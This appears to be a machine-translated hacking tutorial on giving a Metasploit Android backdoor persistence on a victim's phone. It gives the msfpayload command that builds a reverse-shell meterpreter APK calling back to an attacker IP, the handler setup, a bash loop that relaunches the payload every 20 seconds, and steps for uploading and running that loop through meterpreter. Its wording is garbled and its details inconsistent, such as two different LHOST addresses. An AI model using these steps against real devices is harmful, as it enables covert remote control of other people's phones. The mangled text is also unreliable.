Create a Persistent Back Door in Android Using Kali Linux Hack any Android

In this tutorial I will show you how to make the backdoor we have created in my guide here continue.

I finally found a way to do this, as I was / was very poor in bash scripting, it took me a lot of time (20hrs approx.) To make the script work and work, thanks to the green syntaxes I found on other sites.

Step 1: Fire Up Kali and Hack Android system:

Use this guide to hack an Android app on the LAN.

I will be breaking the WAN, using a VM.

Lets Create a back door by typing:

• msfpayload android /meterpreter/reverse_tcp LHOST = 182.68.42.6 R> /root/abcde.apk

• Now, allow to set the listener:
• msfconsole
• use exploit /multi/handler
• set android /meterpreter/reverse_tcp
• set LHOST 192.168.0.4
• exploit

After user/victim installation and opening abcde.apk, Meterpreter Rising ...

Don't Miss: How to Open Somebody's Computer Without a Password (Setting Up the Payload)

Step 2: Create Persistent Script:

Here .. Copy these instructions to the script to build the script, and save it as anything.sh (File extension .sh is important!)

#!/bin/bash

while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage / .MainActivity

sleep 20

done

(There is no line difference in the 3rd and 4th lines, they are single line)

(The first line #! /Bin/bash is also important as you see the script as bash Shell text)

(You can set to sleep for any number of seconds you want the script to sleep)

Move / Copy this to the Home/Root folder of kali.

Updated script v3 (Compatible with any version of Android)

IMPORTANT: DO NOT COPY / PASTE THE SCRIPT DIRECTLY, OR  IT DOESN'T WORK /! \

..I think you will have to write it yourself .. (Don't ask me why ..)

Code:

#!/bin/bash

while:

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done

There is a 'space' between 'while' and ':'

No Multiple spaces in the script.

NO Line Break between 3rd and 4th lines. (So ​​5 lines in total)

Step 3: Upload it to Android Hacking System:

You need to upload the Shell script to etc/init.d/ to persist or after a restart!

To do this, navigate to the index using the following instructions:

• cd/

You should now be in the ROOT directory, you can check by typing:

• ls

Now type:

• cd etc

Check back by typing:

• ls

Also change directory:

• cd init.d
• ls

Here we are ...

Time to Upload the Shell script

Do this by typing:

• upload anything.sh

What The **** ? No! We need Root Access to complete this command! Dammm!

Don't Miss: Hack any Computer Over Wi-Fi with the WiFi Duck Payload Deliverer

Stop:

> Let's just make the application (eg Main Activity) presistent until the restart

> However, it will not persist after the Android app on Victim goes to reboot.

> To do this upload script anywhere on sdcard:

• cd /
• cd /sdcard/Download
• ls
• upload anything.sh

Done! Uploaded!

Step 4: Execute the script:

Now, all we have to do is run the script once, and then all will be done by text automatically.

Drop in to the shell of the application by typing:

• shell

Now, navigate to the location of the Script:

• cd /
• cd /sdcard/Download
• ls

Now is the time for Execution. Type:

• sh anything.sh

Script Activated! All you have to do is press ctrl + C to Stop the shell (Don't worry the script is still in progress)

Restart to Eliminate the script or use Task Killer

Step 5: Testing ...

You can check it by exiting the meterpreter and setting the listener.

You should get a meterpreter immediately!

Proof:

WOW! It happened so fast that 3 Sessions opened in a row.

(I know the picture above shows that I am breaking the LAN instead of the WAN as my Public IP is strong and my router has some technical problems, so it keeps updating itself, so I showed the LAN, BUT there are no problems I checked in -WAN, works well)

Conclusion:

Yes! Finally a persistent backdoor is successfully designed for Android applications.

Don't Miss: How to Hack Facebook Without Phishing SOP (Same Origin Policy)

Things to Remember:

• Background persistence will only remain until the Android system restart.
• If you hack into the WAN and have a strong Public IP, then, the persistence will only last until your router restarts / your IP changes.
• Remember to restart the android to complete the active script, when checking yourself on your Android System.
• If the Victim Android system is rooted and your Public IP is Static, then:

1) Persistence will Remain forever on the WAN!

2) Persistence will remain forever on the LAN Obviously

Say goodbye to the Hackers!

Keep Comming for More!

I will be Waiting for Your Comments and Likes

Thank you.